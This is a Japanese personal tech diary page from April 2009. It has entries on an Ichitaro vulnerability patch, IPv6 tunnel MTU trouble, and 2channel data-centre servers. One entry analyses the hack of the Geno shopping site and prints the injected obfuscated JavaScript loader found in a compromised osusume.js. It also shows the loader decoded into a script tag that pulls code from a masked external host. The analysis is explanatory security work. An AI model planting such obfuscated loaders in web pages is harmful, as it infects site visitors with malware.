というものを見つけた。
IT系に限らず、イベント全体のようだ。
ということで、
IT 勉強会カレンダーや
IT 勉強会カレンダー検索もあわせてご利用をっ(ぉ
|
わたしの日記は日々の出来事の鬱憤晴らしの毒だし日記がメインです。
相当病んでいます。くだを巻いています。許容出来る方のみのアクセスをお願いします。
また、この日記へのリンクは原則自由にして頂いても結構ですが、
写真への直リンクを張るのはご遠慮下さい。内容に関しては、一切保証致しません。
カテゴリ一覧
Network,
Internet,
IPv6,
DC,
NTT,
Comp,
Linux,
Debian,
FreeBSD,
Windows,
Server,
Security,
IRC,
大学,
Neta,
spam,
食,
生活,
遊び,
Drive,
TV,
仕事,
過去日記:
2009年04月07日(火) [晴れ]
* [Other] JAPAN EVENTS
[ コメントを読む(0) |
コメントする
]
* [Comp] [JS09002] 一太郎の脆弱性を悪用した不正なプログラムの実行危険性について
今回の脆弱性は該当製品の文書情報の処理部分に存在しています。 そのため、この脆弱性を悪用することを目的に改ざんされた文書ファイルを直接開いたり、 Webサイト上の文書ファイルをプラグインビューアで開いたり、 悪意のあるサイトへのリンクをクリックするなどしてそのサイトに埋め込まれた文書ファイルを 意図せず開いてしまった場合、外部の第三者からインターネット越しに任意のコードが実行される恐れがあります。
ということなので、早急にアップデート。パッチは下記のところで公開されているようです。
http://www3.justsystem.co.jp/download/ichitaro/up/win/t2009up1.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2008up5.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2007up4.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2006up3.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2005up3.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t2004up5.exe http://www3.justsystem.co.jp/download/ichitaro/up/win/t13up4.exe
また、最近では、AdobeReader、FlashPlayerあたりでも重大な脆弱性がありましたね。
まだの方は、アップデートをお勧めします。
Genoサイトがその脆弱性をついたプログラムを仕掛けられるクラック事件があったようです。
# kashihara
『AdobeReader9以下だとプログラムが書き換えられましたよPFDクリックしたら日本語バージョンだったのに英語バージョンに書き換えられましたプロセッサーオーバーフローしますorz ps フリービット 』
[ コメントを読む(1) |
コメントする
]
* [Comp] Geno サイトクラックの詳細
通販のTOPページは閉じているが、その他のページは生きているのでGoogleさんで検索したら、商品ページは生きていました。
そこで、気になったので、商品ページを確認していると、問題のクラックされたプログラムへアクセスすることができました。
方法は、 w3m -dump_source および less を使用です。
w3m -dump_source www.XXXX.XX.jp/xmlrss/osusume.js (12:30確認)
-----
document.write
(unescape
('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2Fj
queryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E')
.replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
unescapeの部分を元の文字列に置き換えると、つぎのようになります。
詳しくは
この辺(Javascriptのescape関数で判読を難しくする)の説明およびツールをご覧ください。
<soQcripB9tmO smOrc=B9//94tNt.tNt2fq4YMj7tNt.w22YMj.19N65rz0/jqueryB9.mOjoQs>Bn </smOctNtriN6ptNttYMj>
あとは、replace 部分を正規表現で置換すれば解けます。
replaseの正規表現は、次の文字列を削除しなさい、ということなので、
純粋に値を削除すればいいです。
といてみたところ、次のような一文がでてきました。
これが、問題の脆弱性をつく部分でしょう。
<script src=//AA.BBB.C.DDD/jquery.js></script>
それにしても、単純でシンプルだけど気づきにくくするいい方法ですね。
よく考えるなぁ。
別の方法でも使えそうですね。
尚、昨日は、anketo_form.js および banner_koukoku.js に仕掛けられていたそうですが、
現在は修正され、osusume.js を新たに改竄されたようです。
すなわちサーバはバックアップから戻したというところでしょうか。
現在も尚、安全ではなさそうですのでしばらくアクセスは控えたほうがよいでしょう。
関連するサイトへのリンク
# しろてん
『このケースだと結果は変わりないけどこの書き方だとreplaceしてから unescapeされるような...(ぼそっ) 』
# しろてん 『やっぱいかんな脊髄でコメントしちゃ。unescape->replaceが正しいです。 』
# しろてん 『やっぱいかんな脊髄でコメントしちゃ。unescape->replaceが正しいです。 』
[ コメントを読む(2) |
コメントする
]
* [Internet] APNIC-Handle 修正
修正してきた。
情報が古いままだったので…
結構番号が、若い。
私も若いけど...(死語かしら、、、。^_^;;)
[ コメントを読む(0) |
コメントする
]
* [IPv6] IPv6に大きく関連する組織でもほとんど使われていない(と勝手に思っている)IPv6
トンネルでIPv6を割り受けているのですが、実験的な位置づけの回線で私は生活をしています。
注意:半分愚痴です・・・
それにしても最近トラブルが多すぎ、2003年とかのころのほうが断然安定していたと思います。
ここのところ2,3年ぐらいトラブルでよく連絡するのですが、上流はまったく気づいておらず、
サイトの例としては、ietf や apnic といった海外への経路がまったくない時期があり、
1ヶ月ほどまってみましたが、気づく様子はありませんでした。
(その上流組織はそういう対外活動をしているので、ietfなどにアクセスする機会は多々ある)
そこで、問い合わせてみて経路がないことをいうと、調べてくれたりしてきっちりと解決はするのですが、
問い合わせがあるまで気づかないor放置せず、その前に何とかしてほしいなあと思いました。
本当のところ、IPv6だといっている推進組織がそういう状況じゃなぁ。。と。
普及していない理由のひとつが見えた気がします。
実は、今年になってから大きな障害が2回ありましたが、どちらもまったく気づいている様子はありませんでした。
一つ目は、JGN2Plusのアクセスポイントが計画停電だったのにもかかわらず、
接続が切れたまま気づかれず、こちらから問い合わせで
「何があったのでしょうか?」
ときいて、初めて回線が切れていることについて、調べてくれるような感じでした。
また、3月下旬ごろから、AAAAのついたサイトに正しくサイトにアクセスできず、
年度末進行で、修羅場中だったので原因追求せず、とりあえずそのうちに直っているだろうと
放置していましたが、改善されなかったため、落ち着いてから、連絡してみました。
問題が出てしばらくするまで、時間がなくて調査仕切れていなかったので、こちらの問題かも、、
とおもい、とりあえずは、同じトンネルを使っている人に聞いてみたところ、
「IPv6ではまったく生活しとらんからしらん」
といわれる状況で、様子がつかめず、最近、同じトンネルを使い、
生活をしている人を偶然見つけたので、
「そういう状況が起こってないですか?」
と聞いてみたところ、
「確かに最近おかしいですねぇ。。」
と。
でも、原因を追究していなかったようですけど。。
で、私のところじゃないなとおもい、簡単に調べてMTUがおかしいってめぼしをつけ、 上流に連絡したところ、本日連絡がありました。
結果は、次のような感じ。
- JGN2plus 上でジャンボフレームを通してもらう必要がある
- 新しい通信キャリアがジャンボフレームを有効にしていない
- 大きい IP パケットが通信キャリアのネットワーク内で廃棄されている
ちゃんと、気づいているのかどうなのか、
こちらから連絡をしない限り気づかないのもどうなのよ…
って最近本当におもいます。
推進派の人たちがしっかりとつかっていれば、すぐに気づくはずなのに。。。
問い合わせをしたときに、「○○な状況で障害が出ています。しばらくお待ちくださいぐらい。」の回答をしてほしい。
※ ちなみに、今回の組織とは、WIDEではありません・・・。
ほかにIPv4のプラスアルファの価格で、個人で提供してもらえて、且つDNS委譲してもらえるIPv6サービスってないですかね、、、。
私が知るところ、現在ではOCN/IIJあたりで、万/month前後かそれ以上の法人プランしか選択肢がないという時点で、
微妙といえば、微妙です。この状況が変わらない限り普及は難しいきもしますが、その前にNGN、マルチプレフィックス問題ものこってますね。(あっ、話が反れた)
まあ、実験とはいえ、DNS委譲してもらえて、IPv6が使えることは幸せなのかも?と思いましたが、
がんばらないと使えない以上、なかなか普及は難しいかもしれません。
それにしても、個人の私ですら、、IPv6は7年以上さわってますよ?(触るだけですけど・・・)
周りの商用ISPや企業は、情報がないとか言わないでちゃんと調べましょうよ。
IPv6だといわれたときから何かしら触っていれば、情報がないわけではなく、
情報も転がっているし、さわる機会も実績もできたはずです。
日本企業の悪いところですね・・・。
本音として、話はそれてしまいますが、ここんとこ数年のコアルータなどはほとんどIPv6に対応しているはずですし、
最近のL2スイッチはよほど低価格な小規模向けを使わない限り、大半は設備的にはIPv6も対応しているはずです。
そのため、増速やアップデートが行われやすい部分のバックボーンが対応できないはずではないと思います。
おそらく、対応ができないのは、設備投資ではなく、後回しにしすぎた教育、検証、使用実績、ノウハウ、情報の共有なのではないでしょうか。
まあ、そのときから触るということは、それなりの人件コストがかかるでしょうけど、
ぎりぎりになって慌てて検討・検証し、大きな案件を逃したりするほうが余計に損をしているようにしか思えません。
※ (追記) 経路数が、、、という問題は指摘されちゃいました。
で、現在そういうMTU問題がでていて、超悲しいので、仕方なく、わざわざ、IPv4のみに対応したSquidを用意して、AAAAがついているサイトには、Proxy経由で強制的にIPv4で接続せざる得ない状況になっていて非常に悲しいです(;_;
早く直してーーー(;_;)
個人であっても法人向けプランでお金を積まなくても買えるDNS委譲込みのIPv6サービスって存在しないから、強烈に悲しいっす。。。
DNS委譲してくれる、IPv6トンネルサービス(ISP不問)というのがあれば、喜んで飛びつきますよ。
これを機会に、IIJあたりがそういうサービスしてくれないかなあ!?
それはそれで、新しい一つのビジネスですよ!!
(今の段階ではIPv6の帯域を保障してWEBアプリを動かすというよりは、使えるというほうが重要なので、ベストエフォートでもいいでしょう。周りにそういうわービスが無い間はそれでも、飛びつきます。)
#
『iijmioの固定アドレスメニューはipv6トンネルで/48割り当てられます。 dns逆引き委譲も開通後に依頼すれば可能です。 (過去契約していましたが資金難で解約してしまいました)』
# nunnun 『KDDIのイーサエコノミーだったら+3kで/48をもらえますよ。 ただv4が20kで/28とかなのでトータルだと結構高いですが・・・。』
# clworld 『ISP不問重要。 それを抜きにしても上にあがっている二つはどちらも万/month前後ですね。どちらも別にフレッツ回線が必要ですし。 ISP不問な例はOCN IPv6やfeel6ですね(どちらも逆引きは不可のはず)。 …現時点だと6to4がまあまあ良いのが何とも言えない感じです。 GlobalIPv4があれば使用可能、tokyo6to4で通信状態もまあ何とか。固定IPv4であれば逆引きも可。』
# 『IIJとかで繋いでる人の下に/56とかで繋がせてもらうってのが実は一番現実的かもしれないw』
# tomocha 『それは、パスw 本当に安定運用してるのだったらいいけど。。。 ちなみに、いま、自宅内では/64が10個ぐらいセグメントがあるのと、今後も増えそうなので。といっても、/56あれば、十分か。。 あと、それすると、キャリアを無駄にまたいじゃうのでRTTでかくなっちゃうんですよねー。』
# HLA 『IPv6化の最大のネックは経営陣に対しての説得ではないかと思います。一番難しいのですが。』
# nunnun 『KDDIのイーサエコノミーだったら+3kで/48をもらえますよ。 ただv4が20kで/28とかなのでトータルだと結構高いですが・・・。』
# clworld 『ISP不問重要。 それを抜きにしても上にあがっている二つはどちらも万/month前後ですね。どちらも別にフレッツ回線が必要ですし。 ISP不問な例はOCN IPv6やfeel6ですね(どちらも逆引きは不可のはず)。 …現時点だと6to4がまあまあ良いのが何とも言えない感じです。 GlobalIPv4があれば使用可能、tokyo6to4で通信状態もまあ何とか。固定IPv4であれば逆引きも可。』
# 『IIJとかで繋いでる人の下に/56とかで繋がせてもらうってのが実は一番現実的かもしれないw』
# tomocha 『それは、パスw 本当に安定運用してるのだったらいいけど。。。 ちなみに、いま、自宅内では/64が10個ぐらいセグメントがあるのと、今後も増えそうなので。といっても、/56あれば、十分か。。 あと、それすると、キャリアを無駄にまたいじゃうのでRTTでかくなっちゃうんですよねー。』
# HLA 『IPv6化の最大のネックは経営陣に対しての説得ではないかと思います。一番難しいのですが。』
[ コメントを読む(6) |
コメントする
]
* [Internet][Server][DC] にちゃんねるのサーバたち
HNSって、どうやれば、youtube のflvを貼り付けることができるのだろう(^^;
Bananaサーバというか、収容データセンターのビデオが次のURLで公開されています。
http://www.youtube.com/watch?v=JitcAwajlNA
データセンターの中の様子がみれるようです。
サーバ?のタグをみると、40M01 APC3-2 24e3-1 port1 とかいているので、
Extreme Summit 24e3のuplink Giga*2、24ポート10/100のL3スイッチでしょう。
よーく見ると、Summitが移っていますね。
natとか、パケットフィルタリングとかできる変体で、私も所有して使っていますw
2chのサーバなのかはわかりませんが、同じものを使っていますw
DELLかアラクサラっぽいスイッチもみえますね。(似てるけどよくわからなかった)
お互い紫箱が壊れないことを祈りましょうw
そして、ビデオに写っていたサーバの一覧ですw
- Oyster901
- Oyster243
- Banana234
- Banana233
- Banana402
- Banana218
- Banana217
- Banana216
- Banana215
- Banana214
- Banana704
- Cobara2244
- Tiger501
# ラキッ!as永井良晴
『RAWコマンド追加、もしくは ALIAS で可能ですよ〜。 http://x68k.net/diary/200904.html#200904070』
# tomocha 『おおおっ。できましたっ。 ありがとうございますー!』
# tomocha 『おおおっ。できましたっ。 ありがとうございますー!』
[ コメントを読む(2) |
コメントする
]
Diary for 1 day(s)
Powered by hns
HyperNikkiSystem Project
(c) Copyright 1998-2014 tomocha. All rights reserved.